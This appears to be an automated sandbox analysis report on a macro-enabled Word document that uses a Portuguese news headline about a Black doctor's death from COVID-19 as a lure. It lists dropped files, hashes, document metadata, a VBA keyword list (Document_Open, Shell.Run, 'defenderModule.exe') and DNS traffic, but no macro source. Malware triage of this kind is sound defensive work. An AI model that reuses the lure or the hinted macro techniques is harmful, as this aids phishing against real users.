                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-12-27T08:05:04">.. Build: 16.0.13616.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{207CA17B-38C7-4372-969B-EE496C79ABCB}.tmp
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):75264
                                                                                                                                                      Entropy (8bit):3.433192733594239
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:guuVtLM7L9ItLpIuaLx/jI5hLsWI2vLnYIncyfLCm2SIv6IEIQLxIBLZRLoLJ/Ih:IcyGm21TegT
                                                                                                                                                      MD5:8BBEA28E2D34003C75E1C68C9FC04ACF
                                                                                                                                                      SHA1:A69DA78644FF060DB1369EA13C1B3DC86F01036A
                                                                                                                                                      SHA-256:C69974291323AE9BD6FE47A9A3E7B792325C15B1D9CF3A8447CCE85297B94EBC
                                                                                                                                                      SHA-512:EC505E2B442079FAA15565ADE6617A8BDB9B396DF42423A14599D91C563E3943925B13B085BC2D2C6F70F037E7D1F520353902D8EF2FC66874BD308E33359DBF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ....................I.M.A.G.E.N.S. .O.M.I.T.I.D.A.S. .P.E.L.A. .M.I.D.I.A.,. .M.U.L.H.E.R. .N.E.G.R.A. .M.O.R.R.E. .A.P...S. .D.E.N.U.N.C.I.A.R. .A.T.E.N.D.I.M.E.N.T.O. .R.A.C.I.S.T.A. .E.M. .H.O.S.P.I.T.A.L.../...................................../......................./.I.m.a.g.e.n.s. .d.o. .m.o.m.e.n.t.o. .e.m. .q.u.e. .e.l.a. .e. .d.e.s.f.a.r...a.d.a.m.e.n.t.e. .a.f.a.s.t.a.d.a...................................../............................................................................................................................................................................................................................d............V..............................gd.i..l........... .......;...$..$.If......F.!v..h.#v...9:V....F...,..t........9.6.,.....5......99...../.............4......F.p............yt.,......d........gd.<^.l........... .......8...$..$.If......F.!v..h.#v...9:V....F...,..t........9.6.5......99...../.............4......F.p............yt.*......d........gd.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{2F45822A-FABF-400A-A337-13A874CB1859}.tmp
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{A1E40901-705B-4D6D-A1BC-B8A7F39EF540}.tmp
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1536
                                                                                                                                                      Entropy (8bit):1.3708412074519778
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:IiiiiiiiiiVeldI43lnl/bl//l/fl/9vvvvvvvvvvFl/l/lAqsDNjPl3lldHzlbZ:Iiiiiiiiii8l+4cc8++lwG3qm
                                                                                                                                                      MD5:69CEA85DF140789165FE4F0C571582D9
                                                                                                                                                      SHA1:1D0635CA95E20E9B293BB7D4E4CFD6C0BF2FD26A
                                                                                                                                                      SHA-256:2933EF0D88431B8EDD4B44DBAF552CD21A2968B53F59BDB357BAF1769F0BE8B2
                                                                                                                                                      SHA-512:D59CCD27EF5CE1534080269A0835F8F6FD2A5E63A44936C0A28F5297727AB3070B61960BDCA7FAA1993C8FA12D7FA21B2EED5285BD47893775AE977EB0F72512
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Medica negra morre covid-19 apos racismo.docm.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:41 2020, mtime=Sun Dec 27 16:05:04 2020, atime=Sun Dec 27 16:05:01 2020, length=100152, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2430
                                                                                                                                                      Entropy (8bit):4.70467662193963
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8DglvHshnq+y/AuLXk1q+y5Duz7aB6myDglvHshnq+y/AuLXk1q+y5Duz7aB6m:8UmhlvubctqB6pUmhlvubctqB6
                                                                                                                                                      MD5:FD7AA0F26501A4C61D9D978AE8CAA267
                                                                                                                                                      SHA1:A04F05CE5DF6323A626821437CDE3827F5A471A4
                                                                                                                                                      SHA-256:DF62D7E39517841C1E83F590901D38CB347676944E342FC812F2A6B9C6A4847B
                                                                                                                                                      SHA-512:E7F762DB2BF2CE70B792C5261257DBC242FA93CE1B1A2DF39DC26B5F17458B737641EDCA5449CE506F346EA43B35F408320E536139B32E837DD378CDEC8EFC46
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...(.Z.:...R..kr....y.jr...8............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Q......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny..Q.......S......................t.h.a.r.d.z.....~.1.....>Qwx..Desktop.h.......Ny..Q.......Y..............>.......|.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.8....Q.. .MEDICA~1.DOC.........>Qux.Q......h.....................H...M.e.d.i.c.a. .n.e.g.r.a. .m.o.r.r.e. .c.o.v.i.d.-.1.9. . .a.p.o.s. .r.a.c.i.s.m.o...d.o.c.m.......t...............-.......s...........>.S......C:\Users\user\Desktop\Medica negra morre covid-19 apos racismo.docm..E.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.e.d.i.c.a. .n.e.g.r.a. .m.o.r.r.e. .c.o.v.i.d.-.1.9. . .a.p.o.s. .r.a.c.i.s.m.o...d.o.c.m.........:..,.LB.)...As...`.......X.......724536...........!a..%.H.VZAj...i..-.........-..!a..%.H.VZAj...i..-.........-
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):178
                                                                                                                                                      Entropy (8bit):4.471728841059029
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:HjkMFXEZgbMgWFfMWkLprSwAoXEZgbMgWFfMWkLprSmxWjkMFXEZgbMgWFfMWkL2:HjFFaTFfMWkdFaTFfMWkdyFFaTFfMWkC
                                                                                                                                                      MD5:D17AB8486BA359FD7B7708FD8BC3F7FA
                                                                                                                                                      SHA1:4AC6A13D5F58E3B58D04FC5CA7F6513AA99D8780
                                                                                                                                                      SHA-256:BA021FB8E3BAD1681FF21C74F9762EC78DFA041F1CF798DB628BE634631B017F
                                                                                                                                                      SHA-512:92D7939C9FB6E338F565CB715D9B05D605057F4112022B37FD88EA53A029C386988AAAAA1C5E3C206726D8D60ABE1912BDDBFB2A51DFAFED03395329CAF3804F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: [misc]..Medica negra morre covid-19 apos racismo.docm.LNK=0..Medica negra morre covid-19 apos racismo.docm.LNK=0..[misc]..Medica negra morre covid-19 apos racismo.docm.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.4350428487438656
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Rl/ZdRZXf6pKlpdqhREl9laqrl/t:RtZTx6klpoklBrll
                                                                                                                                                      MD5:59E3B68FC4E3C8E1C266A211D9A0C63D
                                                                                                                                                      SHA1:D872A6609D9284A29DC4BA216791046E80A6F5AF
                                                                                                                                                      SHA-256:7CA77933470BD96DCE341F7066440D8AC7EB273302448BDA2457863514E7551E
                                                                                                                                                      SHA-512:B66A638AD30E98AF10DF1BD4A992F8AF49178D7221350FB499B399F9729EEE9B4B82F13CE0C2C74F2C76F8DDA74343DA8DDF74DF75C8696E96EDF9B6889F169E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .pratesh................................................p.r.a.t.e.s.h.........S.-O............................W.QO./..x..t`..tP..t............+.UO.0..........H...
                                                                                                                                                      C:\Users\user\Desktop\~$dica negra morre covid-19 apos racismo.docm
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.4350428487438656
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Rl/ZdRZXf6pKlpdqhREl9laqrl/t:RtZTx6klpoklBrll
                                                                                                                                                      MD5:59E3B68FC4E3C8E1C266A211D9A0C63D
                                                                                                                                                      SHA1:D872A6609D9284A29DC4BA216791046E80A6F5AF
                                                                                                                                                      SHA-256:7CA77933470BD96DCE341F7066440D8AC7EB273302448BDA2457863514E7551E
                                                                                                                                                      SHA-512:B66A638AD30E98AF10DF1BD4A992F8AF49178D7221350FB499B399F9729EEE9B4B82F13CE0C2C74F2C76F8DDA74343DA8DDF74DF75C8696E96EDF9B6889F169E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .pratesh................................................p.r.a.t.e.s.h.........S.-O............................W.QO./..x..t`..tP..t............+.UO.0..........H...

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Word 2007+
                                                                                                                                                      Entropy (8bit):7.94116946391462
                                                                                                                                                      TrID:
                                                                                                                                                      • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                                      • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                                      • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                                      • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                                      File name:Medica negra morre covid-19 apos racismo.docm
                                                                                                                                                      File size:107431
                                                                                                                                                      MD5:549943fa268b65fee546e7adda0f06ba
                                                                                                                                                      SHA1:0ffc18af6916d88bf456f32a2e85b85e56b6c109
                                                                                                                                                      SHA256:c221dc10d175c2f3fb8366ad3aada1cf06c74ad8483a4a67bf62a0702b41c6f5
                                                                                                                                                      SHA512:6114421c747413253cdae3125f9eaff9aa8111785eebcd0836e9c8b43abc47e3acf82112c007e0fdca41940605f6aecc66f322e5106af8b0ee189a22bd1428da
                                                                                                                                                      SSDEEP:3072:iPSJXeHaWtd2jmnXwTzxktQvdtOvlSHpN6:bQvymA3xkte0vlypN6
                                                                                                                                                      File Content Preview:PK..........!.f.E?............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74fcd0d2f692908c

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "/opt/package/joesandbox/database/analysis/334232/sample/Medica negra morre covid-19 apos racismo.docm"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:False
                                                                                                                                                      Application Name:unknown
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Title:
                                                                                                                                                      Subject:
                                                                                                                                                      Author:Orca
                                                                                                                                                      Keywords:
                                                                                                                                                      Template:Normal
                                                                                                                                                      Last Saved By:Neutral Shop
                                                                                                                                                      Revision Number:12
                                                                                                                                                      Total Edit Time:13
                                                                                                                                                      Create Time:2020-12-24T08:21:00Z
                                                                                                                                                      Last Saved Time:2020-12-27T04:32:00Z
                                                                                                                                                      Number of Pages:25
                                                                                                                                                      Number of Words:365
                                                                                                                                                      Number of Characters:1977
                                                                                                                                                      Creating Application:Microsoft Office Word
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Number of Lines:16
                                                                                                                                                      Number of Paragraphs:4
                                                                                                                                                      Thumbnail Scaling Desired:false
                                                                                                                                                      Company:
                                                                                                                                                      Contains Dirty Links:false
                                                                                                                                                      Shared Document:false
                                                                                                                                                      Changed Hyperlinks:false
                                                                                                                                                      Application Version:16.0000

                                                                                                                                                      Streams with VBA

                                                                                                                                                      VBA File Name: ThisDocument.cls, Stream Size: 211789
                                                                                                                                                      General
                                                                                                                                                      Stream Path:VBA/ThisDocument
                                                                                                                                                      VBA File Name:ThisDocument.cls
                                                                                                                                                      Stream Size:211789

                                                                                                                                                      VBA Code Keywords

                                                                                                                                                      Keyword
                                                                                                                                                      "<html><head><meta
                                                                                                                                                      True)
                                                                                                                                                      Byte:
                                                                                                                                                      objItem.DSGlobalCatalogFlag
                                                                                                                                                      objSDUtil.Get("ntSecurityDescriptor")
                                                                                                                                                      img.CreateStickyNote("ageindays_"
                                                                                                                                                      Byte,
                                                                                                                                                      Byte)
                                                                                                                                                      "em"">"
                                                                                                                                                      "bars",
                                                                                                                                                      "Pool
                                                                                                                                                      https://en.wikipedia.org/wiki/Theodorus_of_Cyrene
                                                                                                                                                      "spiral.png",
                                                                                                                                                      Split(theText,
                                                                                                                                                      Object
                                                                                                                                                      objItem.PrimaryOwnerContact
                                                                                                                                                      tii()
                                                                                                                                                      $TempDir
                                                                                                                                                      Wscript.ScriptFullName
                                                                                                                                                      arrDHCPRecord
                                                                                                                                                      CreateObject("Scripting.Filesystemobject")
                                                                                                                                                      Subtitles
                                                                                                                                                      Replace(Text,
                                                                                                                                                      ParseSrt(path,
                                                                                                                                                      Notepad",
                                                                                                                                                      udax(str)
                                                                                                                                                      "Primary
                                                                                                                                                      img.DrawPolygon
                                                                                                                                                      "John"
                                                                                                                                                      objItem.Description
                                                                                                                                                      objItem.PoolNonpagedAllocs
                                                                                                                                                      pivot.LoadChartTemplate
                                                                                                                                                      Where
                                                                                                                                                      ForReading
                                                                                                                                                      False
                                                                                                                                                      "User
                                                                                                                                                      charset(Source)
                                                                                                                                                      Global
                                                                                                                                                      LBound(sb_)
                                                                                                                                                      wdix(p_)
                                                                                                                                                      large
                                                                                                                                                      Allowed
                                                                                                                                                      "Name:
                                                                                                                                                      objtextFile.AtEndOfStream
                                                                                                                                                      objOutput
                                                                                                                                                      objItem.PercentCommittedBytesInUse
                                                                                                                                                      Date)
                                                                                                                                                      objItem.CommitLimit
                                                                                                                                                      "Percent
                                                                                                                                                      'defenderModule.exe'"
                                                                                                                                                      wdix(str)
                                                                                                                                                      UBound(Files)
                                                                                                                                                      height="""
                                                                                                                                                      GetObject("LDAP://OU=Finance,
                                                                                                                                                      "Network:
                                                                                                                                                      "Demand
                                                                                                                                                      'WScript.Echo
                                                                                                                                                      GetObject("winmgmts:"
                                                                                                                                                      objSD.DiscretionaryAcl
                                                                                                                                                      "sample.srt"
                                                                                                                                                      "\Adersoft\Vbsedit\Resources\"
                                                                                                                                                      "Default
                                                                                                                                                      objCatalog
                                                                                                                                                      objItem.PagesPersec
                                                                                                                                                      objItem.DomainName
                                                                                                                                                      objItem.CacheBytes
                                                                                                                                                      pivot.Initialize
                                                                                                                                                      thedy
                                                                                                                                                      Shell.Run
                                                                                                                                                      Vbsedit's
                                                                                                                                                      Delegate
                                                                                                                                                      Distribution
                                                                                                                                                      ADS_ACETYPE_ACCESS_ALLOWED_OBJECT
                                                                                                                                                      CreateObject("Microsoft.Update.AutoUpdate")
                                                                                                                                                      SecondsToString
                                                                                                                                                      objItem.DomainGuid
                                                                                                                                                      "title",
                                                                                                                                                      Stream
                                                                                                                                                      "Server
                                                                                                                                                      "{impersonationLevel=impersonate}!\\"
                                                                                                                                                      arr(i
                                                                                                                                                      timings
                                                                                                                                                      WshShell
                                                                                                                                                      toolkit.OpenFileDialog("",
                                                                                                                                                      objInput.LoadFromFile
                                                                                                                                                      Owner
                                                                                                                                                      objItem.DSTimeServiceFlag
                                                                                                                                                      "<tspan
                                                                                                                                                      Binary
                                                                                                                                                      CreateObject("WbemScripting.SWbemRefresher")
                                                                                                                                                      objDHCPServer.WINSServers
                                                                                                                                                      SFU_Domain")
                                                                                                                                                      Update
                                                                                                                                                      VB_Exposed
                                                                                                                                                      ".png"
                                                                                                                                                      objItem.DSDnsDomainFlag
                                                                                                                                                      objDHCPServer.LeaseRebindingTime
                                                                                                                                                      Input
                                                                                                                                                      scb_(idx)
                                                                                                                                                      "Refresh",
                                                                                                                                                      mask:
                                                                                                                                                      objInput
                                                                                                                                                      Days,
                                                                                                                                                      objOutput.LineSeparator
                                                                                                                                                      strLine
                                                                                                                                                      First
                                                                                                                                                      StringToSeconds(Left(tt,
                                                                                                                                                      Count
                                                                                                                                                      Bytes:
                                                                                                                                                      bytes:
                                                                                                                                                      Mount
                                                                                                                                                      objOutput.charset
                                                                                                                                                      """c:\program
                                                                                                                                                      Spiral
                                                                                                                                                      Limit:
                                                                                                                                                      fso.OpenTextFile(path,
                                                                                                                                                      img.FontFamily
                                                                                                                                                      ADS_RIGHT_DS_CONTROL_ACCESS
                                                                                                                                                      objDHCPServer.Network
                                                                                                                                                      "Transition
                                                                                                                                                      name:
                                                                                                                                                      folder
                                                                                                                                                      FalseSet
                                                                                                                                                      "sheaa"
                                                                                                                                                      Toolkit
                                                                                                                                                      StringToSeconds(from_time)
                                                                                                                                                      objAdminIS.GetCatalogByName("Script
                                                                                                                                                      Video
                                                                                                                                                      VB_GlobalNameSpace
                                                                                                                                                      f.ReadLine
                                                                                                                                                      objShell.ExpandEnvironmentStrings("%LOCALAPPDATA%")
                                                                                                                                                      objItem.SystemDriverResidentBytes
                                                                                                                                                      Stream.Type
                                                                                                                                                      Indexing
                                                                                                                                                      CreateObject("vbsedit.imageprocessor")
                                                                                                                                                      Wscript.CreateObject("Wscript.Shell")
                                                                                                                                                      "lightgreen"
                                                                                                                                                      stroke=""red""
                                                                                                                                                      Central
                                                                                                                                                      objItem
                                                                                                                                                      objAdminIS
                                                                                                                                                      objOutput.WriteText
                                                                                                                                                      Directory
                                                                                                                                                      Server
                                                                                                                                                      "Committed
                                                                                                                                                      Second:
                                                                                                                                                      objAce.Flags
                                                                                                                                                      ForReading)
                                                                                                                                                      http-equiv=""Content-Type""
                                                                                                                                                      currentdir
                                                                                                                                                      Resume
                                                                                                                                                      objItem.PoolPagedResidentBytes
                                                                                                                                                      Primary
                                                                                                                                                      pivot.SetColumnNames
                                                                                                                                                      img.FillPolygon
                                                                                                                                                      Reads
                                                                                                                                                      VB_Base
                                                                                                                                                      fso.CopyFile
                                                                                                                                                      Randomize
                                                                                                                                                      Int(t)
                                                                                                                                                      subtitle
                                                                                                                                                      color
                                                                                                                                                      objItem.DSDnsControllerFlag
                                                                                                                                                      Int((t
                                                                                                                                                      objProxy.ReadOnly
                                                                                                                                                      "c:\scripts"
                                                                                                                                                      Forest
                                                                                                                                                      Angle
                                                                                                                                                      Replace(s,
                                                                                                                                                      objItem.Domain
                                                                                                                                                      mult,
                                                                                                                                                      style=""fill:"
                                                                                                                                                      objAce.AceFlags
                                                                                                                                                      pivot.SaveChart
                                                                                                                                                      objInput.LineSeparator
                                                                                                                                                      LenB(s)
                                                                                                                                                      objSDUtil.SetInfo
                                                                                                                                                      Center
                                                                                                                                                      note.ShowBalloon
                                                                                                                                                      Network")
                                                                                                                                                      img.Save
                                                                                                                                                      objDHCPServer.DNSServers
                                                                                                                                                      Split(str,
                                                                                                                                                      "</tspan>"
                                                                                                                                                      Array(objSD)
                                                                                                                                                      objItem.PoolPagedBytes
                                                                                                                                                      Allocations:
                                                                                                                                                      objSDUtil
                                                                                                                                                      objItem.PageWritesPersec
                                                                                                                                                      objItem.PagesOutputPersec
                                                                                                                                                      x="""
                                                                                                                                                      objItem.PageReadsPersec
                                                                                                                                                      objItem.DcSiteName
                                                                                                                                                      ADS_FLAG_OBJECT_TYPE_PRESENT
                                                                                                                                                      "</svg>"
                                                                                                                                                      sb_()
                                                                                                                                                      "Address:
                                                                                                                                                      img.FontSize
                                                                                                                                                      objInput.Type
                                                                                                                                                      resourceLocation
                                                                                                                                                      """/>"
                                                                                                                                                      "Edit
                                                                                                                                                      SecondsToString(seconds)
                                                                                                                                                      WshShell.Run
                                                                                                                                                      objVS
                                                                                                                                                      objOutput.Open
                                                                                                                                                      objDHCPServer.DefaultGatewayAddress
                                                                                                                                                      "Page
                                                                                                                                                      "DhcpSrvLog-Mon.log",
                                                                                                                                                      vbCrLf)
                                                                                                                                                      objItem.SystemCacheResidentBytes
                                                                                                                                                      Int(Max
                                                                                                                                                      Address
                                                                                                                                                      Name:
                                                                                                                                                      Nonpaged
                                                                                                                                                      CreateObject("AccessControlEntry")
                                                                                                                                                      maisLixo()
                                                                                                                                                      "\"))
                                                                                                                                                      Lines
                                                                                                                                                      objDHCPServer.EndingIPAddress
                                                                                                                                                      ElseIf
                                                                                                                                                      birthdate,
                                                                                                                                                      Values
                                                                                                                                                      InputBox("Enter
                                                                                                                                                      vbCrLf
                                                                                                                                                      VB_TemplateDerived
                                                                                                                                                      read:
                                                                                                                                                      "Arial"
                                                                                                                                                      objStream.Type
                                                                                                                                                      objItem.PagesInputPersec
                                                                                                                                                      objProxy.UserName
                                                                                                                                                      Performance
                                                                                                                                                      Variant:
                                                                                                                                                      UBound(s)
                                                                                                                                                      "<text
                                                                                                                                                      Total
                                                                                                                                                      strFile
                                                                                                                                                      Paged
                                                                                                                                                      Service
                                                                                                                                                      Records"
                                                                                                                                                      ".bak"))
                                                                                                                                                      old",
                                                                                                                                                      CreateObject("Vbsedit.PivotTable")
                                                                                                                                                      "Description:
                                                                                                                                                      Faults
                                                                                                                                                      addresses:
                                                                                                                                                      Scope
                                                                                                                                                      udax(p_)
                                                                                                                                                      objItem.DSKerberosDistributionCenterFlag
                                                                                                                                                      Files
                                                                                                                                                      "Ending
                                                                                                                                                      (*.srt)|*.srt",
                                                                                                                                                      CreateObject("VbsEdit.Toolkit")
                                                                                                                                                      Writes
                                                                                                                                                      "&gt;")
                                                                                                                                                      objStream.Open
                                                                                                                                                      objSettings.Save
                                                                                                                                                      theorem
                                                                                                                                                      objDHCPServer.IsEnabled
                                                                                                                                                      Len(h)
                                                                                                                                                      "\root\sfuadmin")
                                                                                                                                                      out.Close
                                                                                                                                                      objAutoUpdate
                                                                                                                                                      FormatNumber(m,
                                                                                                                                                      objProxy.Address
                                                                                                                                                      Document_Open()
                                                                                                                                                      objOutput.Close
                                                                                                                                                      pivot.Add
                                                                                                                                                      StringToSeconds(until_time)
                                                                                                                                                      using
                                                                                                                                                      dominant-baseline=""middle""
                                                                                                                                                      "your
                                                                                                                                                      pos))
                                                                                                                                                      objAce.AccessMask
                                                                                                                                                      objItem.Caption
                                                                                                                                                      "notepad.exe
                                                                                                                                                      "column"
                                                                                                                                                      objItem.CommittedBytes
                                                                                                                                                      objSettings.ScheduledInstallationDay
                                                                                                                                                      WshShell.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage\ACP")
                                                                                                                                                      charset(strFile)
                                                                                                                                                      objInput.Close
                                                                                                                                                      System
                                                                                                                                                      "Client
                                                                                                                                                      wdix(str
                                                                                                                                                      bytes()
                                                                                                                                                      "Event
                                                                                                                                                      GUID:
                                                                                                                                                      objtextFile
                                                                                                                                                      String
                                                                                                                                                      Split(strLine,
                                                                                                                                                      "Default:
                                                                                                                                                      "stacked",
                                                                                                                                                      gateway
                                                                                                                                                      Catalog
                                                                                                                                                      "Caption:
                                                                                                                                                      toolkit
                                                                                                                                                      objAce.Trustee
                                                                                                                                                      theorem"
                                                                                                                                                      ParseSrt
                                                                                                                                                      CreateObject("WScript.Shell")
                                                                                                                                                      objItem.PoolNonpagedBytes
                                                                                                                                                      objItem.PoolPagedAllocs
                                                                                                                                                      VBA Code

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 375
General
Stream Path: PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 375
Entropy: 5.33453038431
Base64 Encoded: True
                                                                                                                                                      Stream Path: PROJECTwm, File Type: data, Stream Size: 41
General
Stream Path: PROJECTwm
File Type: data
Stream Size: 41
Entropy: 3.07738448508
Base64 Encoded: False
                                                                                                                                                      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 7060
General
Stream Path: VBA/_VBA_PROJECT
File Type: data
Stream Size: 7060
Entropy: 5.55925901598
Base64 Encoded: True
                                                                                                                                                      Stream Path: VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 523
General
Stream Path: VBA/dir
File Type: VAX-order 68K Blit (standalone) executable
Stream Size: 523
Entropy: 6.29824308961
Base64 Encoded: True

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      UDP Packets

                                                                                                                                                      Dec 27, 2020 09:06:37.709011078 CET6063353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:06:37.780196905 CET53606338.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:48.358314037 CET6129253192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:48.433207035 CET53612928.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:49.017365932 CET6361953192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:49.073883057 CET53636198.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:49.616621017 CET6493853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:49.675379992 CET53649388.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:50.134228945 CET6194653192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:50.193504095 CET53619468.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:50.661577940 CET6491053192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:50.719871998 CET53649108.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:51.295795918 CET5212353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:51.355524063 CET53521238.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:52.282711983 CET5613053192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:52.342207909 CET53561308.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:53.083095074 CET5633853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:53.139586926 CET53563388.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:54.364417076 CET5942053192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:54.420855999 CET53594208.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:54.877176046 CET5878453192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:54.933758974 CET53587848.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:26.933121920 CET6397853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:26.992784023 CET53639788.8.8.8192.168.2.3
